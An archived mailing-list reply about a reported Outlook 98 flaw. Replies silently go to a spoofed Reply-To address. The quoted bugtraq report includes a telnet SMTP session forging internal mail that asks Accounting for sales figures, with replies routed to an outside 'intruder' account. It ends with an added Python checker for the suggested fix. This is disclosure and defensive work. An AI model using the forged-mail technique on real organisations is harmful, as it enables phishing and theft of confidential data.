Hi Nate,

I was not able to reproduce the exploit that you reported to the bugtraq
mailing list. Outlook98 did exactly what I expected: when I open the mail,
I see the "From:"-header in the message. When I reply to the email, Outlook
takes the "Reply-To:"-address of the header.

Which version of Outlook did you test?

Best Regards,
Sebastian

PS: your "quick script" has a little bug: the header entry should be
"Reply-To:" instead of "Reply To:".

Nate Lawson <nateat_private> wrote:

> Problem: Outlook uses a sender's Reply-To address silently, allowing
> a user to inadvertently send data to an Internet mail account
> when intending to reply to an internal, trusted user.
>
> Impact: Anyone on the Internet can spoof a trusted internal Exchange user
> and get replies sent back to themself without the user knowing they
> weren't responding to another internal user.
>
> How to reproduce:
>
> 1. Spoof mail as an internal user with a Reply-To address claiming to be
>    an internal user, but an address of an Internet account, say hotmail.
> 2. Go into Outlook and read the mail. The mail looks like it was internally
>    generated but viewing the full Internet headers under View->Options
>    shows the bogus Reply-To header.
> 3. Hit Reply in Outlook. The To: field looks like it's going to a valid
>    internal user, but right clicking on it and choosing Properties shows
>    that the internal user it is sending the reply to is actually an Internet
>    address.
> 4. Enter some text and hit Send. Observe that the mail went to the attacker's
>    account, not the internal one.
>
> A quick script:
>
> {root 5:00pm} ~> telnet mail.example.com 25
> Trying 10.20.2.5...
> Connected to mail.example.com.
> Escape character is '^]'.
> 220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
> helo losebag
> 250 OK
> mail from:<>
> 250 OK - mail from <>
> rcpt to:<accountingat_private>
> 250 OK - Recipient <accountingat_private>
> data
> 354 Send data.  End with CRLF.CRLF
> From: Nate Lawson
> To: Accounting
> Reply To: Nate Lawson<intruderat_private>
> Subject: important!
>
> Please reply with the latest copy of our sales figures!
>
> Thanks,
> Nate
> .
> 250 OK
> quit
> 221 closing connection
> Connection closed by foreign host.
>
> Now, a reply to the email will go not to the trusted internal user Nate
> Lawson <nlawsonat_private> but to the attacker, <intruderat_private>.
> Worse, the user sees no indication that the mail is outward-bound! The
> To: field on the reply simply shows "Nate Lawson", a valid internal user.
>
> Affected programs: Only tested on Outlook 98
>
> Known use of this bug to get confidential information: none yet
>
> Suggested Fix: always show the full email address of any recipient that is
> not local (i.e. usernameat_private would be hidden but any instance of
> userat_private would be shown)
>
> Microsoft has been notified, but claimed this was a weakness in SMTP and
> would not be fixed until a secure successor to SMTP is implemented. They
> obviously missed the point -- the error is not in that mail can be forged,
> but that Outlook allows a user to respond to a message that looks local
> and legitimate, but is actually destined for an outside address.
>
> -Nate

-- 
What's a letter? Is it like E-mail?                       ((o)(o))
|---------------------------------------------------ooOo-( )-oOoo-|
| Sebastian Schreiber, Burgholzweg 36, 72070 Tübingen     ( )     |
| Germany, Voice: ++49 (0)7071 49570                      ( )     |
| GSM: 0049-173-3502725                                   (..)    |
|------------------------------------------------------------------|
Key fingerprint = 3F F5 D5 E0 0A 59 A5 C4 E7 4F 2B EA 7D 83 89 98
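The check Nate's "Suggested Fix" describes, written out as an added example for this archive page (it is neither Sebastian's nor Nate's code, and it is not Outlook's logic): parse a raw message, work out where a Reply would actually be sent (Reply-To if present, otherwise From), and show the full address for any target whose domain is not local, so a display name that claims to be an internal user cannot hide an outside address. The internal domain "example.com", the "example.net" attacker domain and both sample messages are constructed for the example; the first message is modelled on the forged one quoted in the thread, with the header spelled "Reply-To" as Sebastian's PS points out.

```python
"""Check where a reply to a message would actually go.

Added example, not code from the original thread. Parses a raw RFC 822
message, picks the address a mail client's "Reply" would use (Reply-To
if present, otherwise From) and flags any target whose domain is not one
of the configured internal domains. Domains and messages are constructed.
"""
import email
import email.utils
from email.message import Message

# Constructed: the domain(s) this organisation treats as internal.
INTERNAL_DOMAINS = {"example.com"}

# Constructed sample, modelled on the forged message quoted in the thread.
# The display name claims to be an internal user; the address is not.
FORGED = """\
From: Nate Lawson <nlawson@example.com>
To: Accounting <accounting@example.com>
Reply-To: Nate Lawson <intruder@mail.example.net>
Subject: important!

Please reply with the latest copy of our sales figures!
"""

# Constructed sample with no Reply-To: the reply goes back to From.
GENUINE = """\
From: Nate Lawson <nlawson@example.com>
To: Accounting <accounting@example.com>
Subject: lunch

Noon?
"""


def is_internal(addr: str, internal_domains=INTERNAL_DOMAINS) -> bool:
    """True when the domain part of addr is one of the internal domains."""
    if "@" not in addr:
        return False
    domain = addr.rsplit("@", 1)[1].lower()
    return domain in {d.lower() for d in internal_domains}


def reply_targets(raw: str, internal_domains=INTERNAL_DOMAINS):
    """Return [(display_name, address, is_internal)] for where a reply goes.

    Mirrors the behaviour described in the thread: Reply-To wins if set,
    otherwise From is used. Every address in the chosen header is returned.
    """
    msg: Message = email.message_from_string(raw)
    headers = msg.get_all("Reply-To") or msg.get_all("From") or []
    pairs = email.utils.getaddresses(headers)
    return [(name, addr, is_internal(addr, internal_domains))
            for name, addr in pairs if addr]


def render_recipient(name: str, addr: str, internal: bool) -> str:
    """Nate's suggested fix: hide the address only for local recipients and
    always show the full address for anything that leaves the organisation."""
    if internal:
        return name or addr
    return f"{name} <{addr}>" if name else addr


def check_message(raw: str, internal_domains=INTERNAL_DOMAINS):
    """Return (rendered To: field, list of warnings) for a reply to raw."""
    warnings = []
    rendered = []
    for name, addr, internal in reply_targets(raw, internal_domains):
        rendered.append(render_recipient(name, addr, internal))
        if not internal:
            warnings.append(
                f"reply would leave the organisation: '{name}' is really {addr}")
    return ", ".join(rendered), warnings


if __name__ == "__main__":
    for label, raw in (("forged", FORGED), ("genuine", GENUINE)):
        to_field, warns = check_message(raw)
        print(f"[{label}] To: {to_field}")
        for w in warns:
            print("  WARNING:", w)
```

For the forged sample the To: field renders as "Nate Lawson <intruder@mail.example.net>" with one warning; for the genuine sample it renders as just "Nate Lawson" with none. Note that the parser only honours a header spelled "Reply-To"; a line such as "Reply To:" is not a valid header field, which is the slip Sebastian's PS refers to.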
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:44:40 PDT